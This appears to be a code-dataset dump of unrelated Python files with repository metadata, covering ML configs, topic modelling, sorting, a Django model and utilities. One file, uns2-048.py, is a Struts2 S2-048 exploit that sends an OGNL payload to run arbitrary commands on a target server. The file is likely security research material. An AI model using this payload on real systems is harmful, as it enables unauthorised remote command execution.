'../_base_/schedules/schedule_1x.py', '../_base_/default_runtime.py'
]
optimizer = dict(type='SGD', lr=0.02/16, momentum=0.9, weight_decay=0.0001) | 37.428571 | 75 | 0.698473 | 38 | 262 | 4.342105 | 0.763158 | 0.109091 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0.080508 | 0.099237 | 262 | 7 | 75 | 37.428571 | 0.618644 | 0 | 0 | 0 | 0 | 0 | 0.56654 | 0.555133 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | false | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 2 |
6a00ed836ae6ce148dbccef0baeb25420ca39672 | 12,602 | py | Python | project/core/views/TopicModeler.py | tacitia/ThoughtFlow | d8402a7c434f97bc382e37890852711a7e7f161b | [
"MIT"
] | null | null | null | project/core/views/TopicModeler.py | tacitia/ThoughtFlow | d8402a7c434f97bc382e37890852711a7e7f161b | [
"MIT"
] | 1 | 2016-02-04T03:17:13.000Z | 2016-02-04T03:17:13.000Z | project/core/views/TopicModeler.py | tacitia/ThoughtFlow | d8402a7c434f97bc382e37890852711a7e7f161b | [
"MIT"
] | null | null | null | import gensim
from gensim.similarities.docsim import MatrixSimilarity
import math
import numpy as np
import pandas as pd
import textmining
import lda
import lda.datasets
from nltk.corpus import stopwords
from timeit import default_timer as timer
from collections import defaultdict
from pattern.en import singularize
from pprint import pprint
def compute_tdm(docs):
# Create some very short sample documents
# doc1 = 'The prefrontal cortex (PFC) subserves cognitive control: the ability to coordinate thoughts or actions in relation with internal goals. Its functional architecture, however, remains poorly understood. Using brain imaging in humans, we showed that the lateral PFC is organized as a cascade of executive processes from premotor to anterior PFC regions that control behavior according to stimuli, the present perceptual context, and the temporal episode in which stimuli occur, respectively. The results support an unified modular model of cognitive control that describes the overall functional organization of the human lateral PFC and has basic methodological and theoretical implications.'
# doc2 = 'The prefrontal cortex (PFC) is central to flexible and organized action. Recent theoretical and empirical results suggest that the rostro-caudal axis of the frontal lobes may reflect a hierarchical organization of control. Here, we test whether the rostro-caudal axis of the PFC is organized hierarchically, based on the level of abstraction at which multiple representations compete to guide selection of action. Four functional magnetic resonance imaging (fMRI) experiments parametrically manipulated the set of task-relevant (a) responses, (b) features, (c) dimensions, and (d) overlapping cue-to-dimension mappings. A systematic posterior to anterior gradient was evident within the PFC depending on the manipulated level of representation. Furthermore, across four fMRI experiments, activation in PFC subregions was consistent with the sub- and superordinate relationships that define an abstract representational hierarchy. In addition to providing further support for a representational hierarchy account of the rostro-caudal gradient in the PFC, these data provide important empirical constraints on current theorizing about control hierarchies and the PFC.'
# doc3 = 'Control regions in the brain are thought to provide signals that configure the brains moment-to-moment information processing. Previously, we identified regions that carried signals related to task-control initiation, maintenance, and adjustment. Here we characterize the interactions of these regions by applying graph theory to resting state functional connectivity MRI data. In contrast to previous, more unitary models of control, this approach suggests the presence of two distinct task-control networks. A frontoparietal network included the dorsolateral prefrontal cortex and intraparietal sulcus. This network emphasized start-cue and error-related activity and may initiate and adapt control on a trial-by-trial basis. The second network included dorsal anterior cingulate/medial superior frontal cortex, anterior insula/frontal operculum, and anterior prefrontal cortex. Among other signals, these regions showed activity sustained across the entire task epoch, suggesting that this network may control goal-directed behavior through the stable maintenance of task sets. These two independent networks appear to operate on different time scales and affect downstream processing via dissociable mechanisms.'
# doc4 = 'Neuromodulators such as dopamine have a central role in cognitive disorders. In the past decade, biological findings on dopamine function have been infused with concepts taken from computational theories of reinforcement learning. These more abstract approaches have now been applied to describe the biological algorithms at play in our brains when we form value judgements and make choices. The application of such quantitative models has opened up new fields, ripe for attack by young synthesizers and theoreticians.'
# Initialize class to create term-document matrix
tdm = textmining.TermDocumentMatrix()
print '>> filtering stopwords...'
englishStopWords = get_stopwords('english')
for d in docs:
words = d.split(' ')
filtered_words = filter(lambda x: x.lower() not in englishStopWords, words)
tdm.add_doc(' '.join(filtered_words))
print '>> computing tdm...'
raw_matrix = list(tdm.rows(cutoff=2))
return raw_matrix
# filtered_matrix = filter_stopwords(raw_matrix)
# return filtered_matrix
# return apply_tfidt_transform(raw_matrix)
def get_stopwords(language, name):
result = stopwords.words(language)
result.extend(['new', 'using', 'used', 'finding', 'findings'])
if (name == 'TVCG'):
result.extend(['datum', 'present', 'use', 'show', 'two', 'paper', 'different', 'visual', 'visualization', 'also', 'since', 'acquired', 'thus', 'lack', 'due', 'studied', 'useful', 'possible', 'additional', 'particular', 'describe', 'without', 'reported', 'among', 'always', 'various', 'prove', 'usable', 'yet', 'ask', 'within', 'even', 'best', 'run', 'including', 'like', 'importantly', 'six', 'look', 'along', 'one', 'visually', 'ha', 'wa'])
return result
def filter_stopwords(matrix):
header = matrix[0]
filtered_counts = [[row[col_idx] for col_idx in range(len(row)) if header[col_idx] not in stopwords.words('english')] for row in matrix[1:]]
filtered_header = filter(lambda x: x not in stopwords.words('english'), header)
return [filtered_header] + filtered_counts
def apply_tfidt_transform(matrix):
# print matrix
num_document = float(reduce(lambda x, y: x+1, matrix, 0))
term_counts = [sum(row[col_idx] for row in matrix[1:]) for col_idx in range(len(matrix[0]))]
for row in matrix[1:]:
num_word = float(reduce(lambda x, y: x+y, row))
for col_idx in range(len(row)):
cell = row[col_idx]
if cell != 0:
term_occurrence = term_counts[col_idx]
term_freq = cell / num_word
inverse_doc_freq = np.log(abs(num_document / term_occurrence))
row[col_idx] = term_freq * inverse_doc_freq
return convert_to_positive_integer_matrix(matrix)
def convert_to_positive_integer_matrix(matrix):
result = []
term_counts = [sum(row[col_idx] for row in matrix[1:]) for col_idx in range(len(matrix[0]))]
for row_idx in range(len(matrix)):
new_row = []
for col_idx in range(len(matrix[row_idx])):
if term_counts[col_idx] > 0:
if row_idx == 0:
new_row.append(matrix[row_idx][col_idx])
else:
new_row.append(int(matrix[row_idx][col_idx] * 1000)) # should we actually try to infer this?
result.append(new_row)
return result
def fit_topic_model(tdm, vocab):
print '>> fitting topic model...'
n_doc = len(tdm)
model = lda.LDA(n_topics=min(n_doc/10+2, 5), n_iter=100, random_state=1)
model.fit(tdm)
topic_word = model.topic_word_
doc_topic = model.doc_topic_
# take the top 8 words for each topic
topics = []
n_top_words = 8
for i, topic_dist in enumerate(topic_word):
topic_words = np.array(vocab)[np.argsort(topic_dist)][:-n_top_words:-1]
# print('Topic {}: {}'.format(i, ' '.join(topic_words)))
topics.append(topic_words.tolist())
# print the topic for each document
doc_topic_map = {}
for n in range(n_doc):
# topic_most_pr = doc_topic[n].argmax()
# print("doc: {} topic: {}\n".format(n, topic_most_pr))
# doc_topic_map[n] = topic_most_pr
doc_topic_map[n] = {}
doc_topic_map[n]['dist'] = doc_topic[n].tolist()
doc_topic_map[n]['max'] = doc_topic[n].argmax()
return topics, doc_topic_map
def run(docs):
tdm = compute_tdm(docs)
return fit_topic_model(np.array(tdm[1:]), tdm[0])
# Print out words with negative weight
#for col_idx in range(len(tdm[0])):
# if tdm[1][col_idx] < 0:
# print tdm[0][col_idx]
def generate_dictionary(texts, name, numDocs):
print '>> generating dictionary...'
dictionary = gensim.corpora.Dictionary(texts)
numDocs = len(texts)
print numDocs
dictionary.filter_extremes(no_below=20, no_above=0.3, keep_n=100000)
dictionary.save(name + '.dict')
print 'dictionary information: '
print dictionary
return dictionary
# Extensions since last run:
# - singularize individual tokens
def docs2corpus(docs, name, isNew):
print '>> converting documents to corpus...'
numDocs = len(docs)
englishStopWords = get_stopwords('english', name)
# texts = [[word for word in doc.lower().split() if word not in englishStopWords and word.isalpha() and len(word) > 1] for doc in docs]
texts = [[singularize(word) for word in doc.lower().split() if singularize(word) not in englishStopWords and word.isalpha() and len(word) > 1] for doc in docs]
# remove words that appear only once
frequency = defaultdict(int)
for text in texts:
for token in text:
frequency[token] += 1
texts = [[token for token in text if frequency[token] > 1] for text in texts]
print len(texts)
if isNew:
dictionary = generate_dictionary(texts, name, numDocs) #uncomment for new corpus
else:
dictionary = gensim.corpora.Dictionary.load(name + '.dict')
corpus = [dictionary.doc2bow(text) for text in texts]
if isNew:
gensim.corpora.MmCorpus.serialize(name + '.mm', corpus) # store to disk, for later use
return corpus, dictionary
def get_document_topics(doc, name):
lda = gensim.models.ldamodel.LdaModel.load(name + '.lda')
englishStopWords = get_stopwords('english', name)
text = [singularize(word) for word in doc.lower().split() if singularize(word) not in englishStopWords and word.isalpha() and len(word) > 1]
dictionary = gensim.corpora.Dictionary.load(name + '.dict')
document_topics = lda.get_document_topics(dictionary.doc2bow(text), minimum_probability=0.05)
if len(document_topics) > 0:
primary_topic_tuple = max(document_topics, key=lambda x:x[1])
topic_terms = lda.show_topic(primary_topic_tuple[0])
print topic_terms
return document_topics, topic_terms
else:
return [], ''
def compute_documents_similarity_sub(target, docs, name):
print 'here'
corpus, dictionary = docs2corpus(docs, name, False)
lda = gensim.models.ldamodel.LdaModel.load(name + '.lda')
# dictionary = gensim.corpora.Dictionary.load('/tmp/' + name + '.dict')
numTokens = len(dictionary.values())
lda_corpus = lda[corpus]
index = MatrixSimilarity(lda_corpus, num_features=numTokens)
print index
sims = index[target]
sort_sims = sorted(enumerate(sims), key=lambda item: -item[1])
top_documents = sort_sims[:200]
return map(lambda item: item[0], top_documents)
# target is an array of topic distribution
def compute_documents_similarity(target, name):
dictionary = gensim.corpora.Dictionary.load(name + '.dict')
index = MatrixSimilarity.load(name + '.sim')
print index
sims = index[target]
sort_sims = sorted(enumerate(sims), key=lambda item: -item[1])
top_documents = sort_sims[:200]
return map(lambda item: item[0], top_documents)
def lda2topicMap(lda, corpus, ids, name):
print '>> generating topic map...'
evidenceTopicMap = {}
# dictionary = gensim.corpora.Dictionary.load('/tmp/' + name + '.dict')
i = 0
for c in corpus:
# b = dictionary.doc2bow(d)
evidenceTopicMap[ids[i]] = lda.get_document_topics(c, minimum_probability=0.01)
i += 1
print len(evidenceTopicMap)
return evidenceTopicMap
def create_online_lda(docs, ids, name, numTopics):
corpus, dictionary = docs2corpus(docs, name, True)
print '>> generating online lda model...'
lda = gensim.models.ldamodel.LdaModel(corpus, num_topics=numTopics, id2word=dictionary, passes=10)
print lda
lda.save(name + '.lda')
return lda2topicMap(lda, corpus, ids, name), lda.show_topics(formatted=False)
def load_online_lda(docs, ids, name):
print '>> loading online lda model...'
corpus, dictionary = docs2corpus(docs, name, False)
lda = gensim.models.ldamodel.LdaModel.load(name + '.lda')
# return a map from evidence to topic and a list of topics
return lda2topicMap(lda, corpus, ids, name), lda.show_topics(formatted=False)
def get_online_lda_topics(name, numTopics):
lda = gensim.models.ldamodel.LdaModel.load(name + '.lda')
return lda.show_topics(num_topics=numTopics, formatted=False)
def create_similarity_matrix(name):
lda = gensim.models.ldamodel.LdaModel.load(name + '.lda')
corpus = gensim.corpora.MmCorpus(name + '.mm')
lda_corpus = lda[corpus]
dictionary = gensim.corpora.Dictionary.load(name + '.dict')
numTokens = len(dictionary.values())
index = MatrixSimilarity(lda_corpus, num_features=numTokens)
index.save(name + '.sim')
return
| 53.625532 | 1,229 | 0.745755 | 1,788 | 12,602 | 5.153803 | 0.296421 | 0.01172 | 0.007596 | 0.009875 | 0.249485 | 0.202821 | 0.17732 | 0.138795 | 0.120239 | 0.104395 | 0 | 0.008138 | 0.151643 | 12,602 | 234 | 1,230 | 53.854701 | 0.853802 | 0.382638 | 0 | 0.225989 | 0 | 0 | 0.082225 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | null | null | 0.00565 | 0.079096 | null | null | 0.107345 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 1 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 2 |
6a124b2c3fadf545d29b943c65d4afaf8fd6843b | 178 | py | Python | configs/mswin/mswin_seq_small_patch4_512x512_160k_ade20k_pretrain_224x224_1K.py | yutao1008/MSwin | acdb750e9e0a7b978b1bae0a1d571e197eeb358a | [
"MIT"
] | null | null | null | configs/mswin/mswin_seq_small_patch4_512x512_160k_ade20k_pretrain_224x224_1K.py | yutao1008/MSwin | acdb750e9e0a7b978b1bae0a1d571e197eeb358a | [
"MIT"
] | null | null | null | configs/mswin/mswin_seq_small_patch4_512x512_160k_ade20k_pretrain_224x224_1K.py | yutao1008/MSwin | acdb750e9e0a7b978b1bae0a1d571e197eeb358a | [
"MIT"
] | null | null | null | _base_ = ['./mswin_par_small_patch4_512x512_160k_ade20k_pretrain_224x224_1K.py']
model = dict(
decode_head=dict(
mode='seq',
))
data = dict(samples_per_gpu=10)
| 19.777778 | 80 | 0.707865 | 25 | 178 | 4.48 | 0.92 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0.141892 | 0.168539 | 178 | 8 | 81 | 22.25 | 0.614865 | 0 | 0 | 0 | 0 | 0 | 0.393258 | 0.376404 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | false | 0 | 0 | 0 | 0 | 0 | 1 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 2 |
6a1caadef8d84715dd466b2c3be6d1909bcee742 | 500 | py | Python | Course 1 - Divide and Conquer, Sorting and Searching, and Randomized Algorithms/Week 1/MergeSort.py | PeterQiu0516/Algorithms-Coding-Exercise | 0e8d1742e23ed4d0846b14171f8e27eada5ac1fb | [
"MIT"
] | null | null | null | Course 1 - Divide and Conquer, Sorting and Searching, and Randomized Algorithms/Week 1/MergeSort.py | PeterQiu0516/Algorithms-Coding-Exercise | 0e8d1742e23ed4d0846b14171f8e27eada5ac1fb | [
"MIT"
] | null | null | null | Course 1 - Divide and Conquer, Sorting and Searching, and Randomized Algorithms/Week 1/MergeSort.py | PeterQiu0516/Algorithms-Coding-Exercise | 0e8d1742e23ed4d0846b14171f8e27eada5ac1fb | [
"MIT"
] | null | null | null | def merge_sort(arr):
n = len(arr)
if (n >= 2):
A = merge_sort(arr[:int(n/2)])
B = merge_sort(arr[int(n/2):])
i = 0
j = 0
for k in range(0, n):
if i < int(n/2) and (j == len(B) or A[i] <= B[j]):
arr[k] = A[i]
i = i + 1
else:
arr[k] = B[j]
j = j + 1
return arr
arr = input()
arr = [(int(num)) for num in arr.split()]
print(merge_sort(arr)) | 23.809524 | 63 | 0.372 | 79 | 500 | 2.303797 | 0.341772 | 0.197802 | 0.263736 | 0.164835 | 0.186813 | 0.186813 | 0 | 0 | 0 | 0 | 0 | 0.033333 | 0.46 | 500 | 21 | 64 | 23.809524 | 0.640741 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0.055556 | false | 0 | 0 | 0 | 0.111111 | 0.055556 | 0 | 0 | 0 | null | 0 | 1 | 1 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 2 |
6a3361695cb7e2ecbc1fd5a93a3ebb025d6ecb9f | 1,985 | py | Python | source/online-verification/confidence.py | joaopdmartins/Verifiable-AI | 8f67fa9ab42d0203973c9dcedb991e7959f21140 | [
"BSD-3-Clause"
] | null | null | null | source/online-verification/confidence.py | joaopdmartins/Verifiable-AI | 8f67fa9ab42d0203973c9dcedb991e7959f21140 | [
"BSD-3-Clause"
] | null | null | null | source/online-verification/confidence.py | joaopdmartins/Verifiable-AI | 8f67fa9ab42d0203973c9dcedb991e7959f21140 | [
"BSD-3-Clause"
] | null | null | null | from subprocess import call
from re import findall
from copy import deepcopy
def within_confidence_region(patient, X_labels, model, output):
#patient: list with data
#X_labels: ['SEX','Age','Enrl','RF','CCS>II','DEP ST','SBP','HR','KILLIP','TN','Creat','CAA','AAS','Angina','Kn. CAD']
#model: model name (function)
#output: risk evaluation
#add the patient input data to the model
call(["spin", "-DAGE=" + str(int(patient[X_labels.index("Age")])), "-DHR="+str(int(patient[X_labels.index("HR")])), "-DSBP="+str(int(patient[X_labels.index("SBP")])), "-DCREAT="+str(int(patient[X_labels.index("Creat")]*10)), "-DKILLIP="+str(int(patient[X_labels.index("KILLIP")])), "-DCAA="+str(int(patient[X_labels.index("CAA")])), "-DDEPST="+str(int(patient[X_labels.index("DEP ST")])), "-DTN="+str(int(patient[X_labels.index("TN")])), "-DRISK="+str(output).lower(),"-a","grace_online.pml"])
#compile
call(["gcc","pan.c", "-o", "pan",'-Wno-overlength-strings','-Wno-format-overflow','-w'])
#call the executer
call(["./pan"], stdout=open("data_out.txt",'w'))
#read the output
file=open("data_out.txt",'r')
filetext=file.read()
file.close()
#search for keyword "errors:"
errors = int(findall("errors:.*\\n",filetext)[0].split()[1])
if errors:
return False
return True
def explain_negative(patient, X_labels, model, output):
#spin -t model.pml
call(["spin","-t","-DAGE=" + str(int(patient[X_labels.index("Age")])), "-DHR="+str(int(patient[X_labels.index("HR")])), "-DSBP="+str(int(patient[X_labels.index("SBP")])), "-DCREAT="+str(int(patient[X_labels.index("Creat")]*10)), "-DKILLIP="+str(int(patient[X_labels.index("KILLIP")])), "-DCAA="+str(int(patient[X_labels.index("CAA")])), "-DDEPST="+str(int(patient[X_labels.index("DEP ST")])), "-DTN="+str(int(patient[X_labels.index("TN")])), "-DRISK="+str(output).lower(),"-t","grace_online.pml"], stdout=open("explanation.txt",'w')) | 53.648649 | 537 | 0.629219 | 288 | 1,985 | 4.246528 | 0.354167 | 0.108749 | 0.206051 | 0.183156 | 0.510221 | 0.469338 | 0.469338 | 0.469338 | 0.469338 | 0.469338 | 0 | 0.003417 | 0.115365 | 1,985 | 37 | 537 | 53.648649 | 0.693052 | 0.158186 | 0 | 0 | 0 | 0 | 0.206378 | 0.013839 | 0 | 0 | 0 | 0 | 0 | 1 | 0.125 | false | 0 | 0.1875 | 0 | 0.4375 | 0 | 0 | 0 | 0 | null | 0 | 1 | 1 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 2 |
dbe904534b4ac2f7ee927bf0f9974ff5f7b97c2c | 311 | py | Python | cloud_info_provider/collectors/cloud.py | enolfc/cloud-bdii-provider | d9db168a62364da4936057f7ba848ecfc4464e16 | [
"Apache-2.0"
] | null | null | null | cloud_info_provider/collectors/cloud.py | enolfc/cloud-bdii-provider | d9db168a62364da4936057f7ba848ecfc4464e16 | [
"Apache-2.0"
] | 22 | 2016-11-22T13:08:00.000Z | 2018-04-06T14:13:20.000Z | cloud_info_provider/collectors/cloud.py | EGI-Federation/cloud-info-provider | a1aa462fc5d1ccbad2f7c0e68336003d761ec63e | [
"Apache-2.0"
] | 6 | 2015-09-17T07:09:16.000Z | 2016-11-16T09:33:53.000Z | from cloud_info_provider.collectors import base
class CloudCollector(base.BaseCollector):
def __init__(self, *args):
super(CloudCollector, self).__init__(*args)
self.templates = ("headers", "clouddomain")
def fetch(self):
return self._get_info_from_providers("get_site_info")
| 28.272727 | 61 | 0.717042 | 36 | 311 | 5.75 | 0.638889 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0.173633 | 311 | 10 | 62 | 31.1 | 0.805447 | 0 | 0 | 0 | 0 | 0 | 0.099678 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0.285714 | false | 0 | 0.142857 | 0.142857 | 0.714286 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 1 | 0 | 0 | 0 | 1 | 0 | 0 | 0 | 2 |
dbebaced1f910aa6fd13a5b6efb45248a18bd212 | 1,549 | py | Python | EXP/S2-048/uns2-048.py | Octoberr/swm0920 | 8f05a6b91fc205960edd57f9076facec04f49a1a | [
"Apache-2.0"
] | 2 | 2019-05-19T11:54:26.000Z | 2019-05-19T12:03:49.000Z | EXP/S2-048/uns2-048.py | Octoberr/swm0920 | 8f05a6b91fc205960edd57f9076facec04f49a1a | [
"Apache-2.0"
] | 1 | 2020-11-27T07:55:15.000Z | 2020-11-27T07:55:15.000Z | EXP/S2-048/uns2-048.py | Octoberr/swm0920 | 8f05a6b91fc205960edd57f9076facec04f49a1a | [
"Apache-2.0"
] | 2 | 2021-09-06T18:06:12.000Z | 2021-12-31T07:44:43.000Z | #coding:utf-8
'''
测试没有成功
2018/06/27
'''
import sys
import requests
requests.packages.urllib3.disable_warnings()
def poccheck(url, cmd='whoami'):
result = False
header = {
'User-Agent': 'Mozilla/5.0 (Macintosh; Intel Mac OS X 10_12_3) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/56.0.2924.87 Safari/537.36',
'Content-Type': "application/x-www-form-urlencoded"
}
data = "name=${(#o=@ognl.OgnlContext@DEFAULT_MEMBER_ACCESS).(#_memberAccess?(#_memberAccess=#o):((#c=#context['com.opensymphony.xwork2.ActionContext.container']).(#g=#c.getInstance(@com.opensymphony.xwork2.ognl.OgnlUtil@class)).(#g.getExcludedPackageNames().clear()).(#g.getExcludedClasses().clear()).(#context.setMemberAccess(#o)))).(#o=@org.apache.EXP.ServletActionContext@getResponse().getOutputStream()).(#p=@java.lang.Runtime@getRuntime().exec('%s')).(@org.apache.commons.io.IOUtils@copy(#p.getInputStream(),#o)).(#o.flush())}&age=1212&__checkbox_bustedBefore=true&description=123" % str(
cmd)
if 'integration' not in url:
url = url + "/EXP-showcase/integration/saveGangster.action"
try:
response = requests.post(url, data=data, headers=header, verify=False, allow_redirects=False)
if response.status_code == 200 and 'EXP-showcase' not in response.content:
result = response.content
except Exception as e:
print str(e)
pass
return result
if __name__ == '__main__':
url = 'http://127.0.0.1:8083/integration/saveGangster.action'
res = poccheck(url)
print res | 44.257143 | 597 | 0.68754 | 197 | 1,549 | 5.304569 | 0.680203 | 0.021053 | 0.040191 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0.043544 | 0.14009 | 1,549 | 35 | 598 | 44.257143 | 0.740991 | 0.007747 | 0 | 0 | 0 | 0.08 | 0.58664 | 0.433201 | 0 | 0 | 0 | 0 | 0 | 0 | null | null | 0.04 | 0.08 | null | null | 0.08 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | null | 0 | 0 | 0 | 0 | 1 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 2 |
dbf3246ed1a3fde3c4760256420027f164297b3b | 409 | py | Python | metaopt/objective/integer/fast/explicit/g.py | cigroup-ol/metaopt | 6dfd5105d3c6eaf00f96670175cae16021069514 | [
"BSD-3-Clause"
] | 8 | 2015-02-02T21:42:23.000Z | 2019-06-30T18:12:43.000Z | metaopt/objective/integer/fast/explicit/g.py | cigroup-ol/metaopt | 6dfd5105d3c6eaf00f96670175cae16021069514 | [
"BSD-3-Clause"
] | 4 | 2015-09-24T14:12:38.000Z | 2021-12-08T22:42:52.000Z | metaopt/objective/integer/fast/explicit/g.py | cigroup-ol/metaopt | 6dfd5105d3c6eaf00f96670175cae16021069514 | [
"BSD-3-Clause"
] | 6 | 2015-02-27T12:35:33.000Z | 2020-10-15T21:04:02.000Z | # -*- coding: utf-8 -*-
"""
Working function with integer parameters and explicit maximization.
"""
# Future
from __future__ import absolute_import, division, print_function, \
unicode_literals, with_statement
# First Party
from metaopt.core.paramspec.util import param
from metaopt.core.returnspec.util.decorator import minimize
@minimize("y")
@param.int("x", interval=[0, 10])
def f(x):
return x
| 22.722222 | 67 | 0.743276 | 54 | 409 | 5.481481 | 0.722222 | 0.074324 | 0.101351 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0.011331 | 0.136919 | 409 | 17 | 68 | 24.058824 | 0.827195 | 0.266504 | 0 | 0 | 0 | 0 | 0.006897 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0.125 | false | 0 | 0.375 | 0.125 | 0.625 | 0.125 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 1 | 0 | 0 | 0 | 2 |
dbf4d371ba4b186b58b5d32d2bdfc37e92933452 | 241 | py | Python | lab-dyn-dns/server/who_am_i/app.py | patrickcberry/lab-ind40 | ab4bc85f2713e98c2a43e3229460b53d9b45a2ea | [
"MIT"
] | null | null | null | lab-dyn-dns/server/who_am_i/app.py | patrickcberry/lab-ind40 | ab4bc85f2713e98c2a43e3229460b53d9b45a2ea | [
"MIT"
] | null | null | null | lab-dyn-dns/server/who_am_i/app.py | patrickcberry/lab-ind40 | ab4bc85f2713e98c2a43e3229460b53d9b45a2ea | [
"MIT"
] | null | null | null | import json
def lambda_handler(event, context):
return {
"statusCode": 200,
"body": json.dumps({
"name": 'who_am_i',
"sourceIp": event['requestContext']['identity']['sourceIp']
}),
}
| 20.083333 | 71 | 0.522822 | 22 | 241 | 5.590909 | 0.863636 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0.018072 | 0.311203 | 241 | 11 | 72 | 21.909091 | 0.722892 | 0 | 0 | 0 | 0 | 0 | 0.26556 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0.111111 | false | 0 | 0.111111 | 0.111111 | 0.333333 | 0 | 1 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | 0 | 0 | 2 |
dbf78ed047f64ffbd4d10562d069d46f1c0b7a0f | 454 | py | Python | tests/test_mongodict.py | BalighMehrez/functions-cache | 4ab22f238efe5e7b77b23587877dfa74c6dd2b10 | [
"BSD-2-Clause"
] | null | null | null | tests/test_mongodict.py | BalighMehrez/functions-cache | 4ab22f238efe5e7b77b23587877dfa74c6dd2b10 | [
"BSD-2-Clause"
] | null | null | null | tests/test_mongodict.py | BalighMehrez/functions-cache | 4ab22f238efe5e7b77b23587877dfa74c6dd2b10 | [
"BSD-2-Clause"
] | null | null | null | #!/usr/bin/env python
import unittest
from tests.test_custom_dict import BaseCustomDictTestCase
try:
from functions_cache.engines.storage.mongodict import MongoDict, MongoPickleDict
except ImportError:
print("pymongo not installed")
else:
class MongoDictTestCase(BaseCustomDictTestCase, unittest.TestCase):
dict_class = MongoDict
pickled_dict_class = MongoPickleDict
if __name__ == '__main__':
unittest.main()
| 25.222222 | 84 | 0.757709 | 47 | 454 | 7.021277 | 0.702128 | 0.054545 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0.171806 | 454 | 17 | 85 | 26.705882 | 0.87766 | 0.044053 | 0 | 0 | 0 | 0 | 0.066975 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | false | 0 | 0.333333 | 0 | 0.583333 | 0.083333 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | 1 | 0 | 0 | 2 |
e009fca930c93d2e90ee6d46dc56538dbe47e281 | 4,417 | py | Python | course/models.py | CengineLab/cenginelab | 83fa9fb9ab8a76b03778ac17d73aa6c00a7bf978 | [
"MIT"
] | 1 | 2020-10-10T09:05:19.000Z | 2020-10-10T09:05:19.000Z | course/models.py | Koffi-Cobbin/cenginelab | 29d32c15541b36910fad8154b50f67afb8810ab6 | [
"MIT"
] | 6 | 2021-04-08T20:09:57.000Z | 2022-03-12T00:49:24.000Z | course/models.py | Joetib/cenginelab | 30fade3ca3d9e42923ba8098bc09c153be6b411d | [
"MIT"
] | 3 | 2020-10-07T20:19:52.000Z | 2020-11-09T14:42:55.000Z | from django.db import models
from django.contrib.auth import get_user_model
from django.utils.text import slugify
from django.urls import reverse
# Create your models here.
User = get_user_model()
class Course(models.Model):
"""Model instance to represent a course on the website"""
created_by = models.ForeignKey(
User, related_name="created_courses", on_delete=models.CASCADE
)
title = models.CharField(max_length=500)
description = models.TextField()
picture = models.ImageField(upload_to="courses/pictures/%Y/%m/")
slug = models.SlugField(blank=True)
date_created = models.DateTimeField(auto_now_add=True)
last_modified = models.DateTimeField(auto_now=True)
class Meta:
ordering = (
"-date_created",
"title",
)
def __str__(self) -> str:
return self.title
def __repr__(self) -> str:
return f"<Course: {self.title[:30]}>"
def save(self, *args, **kwargs):
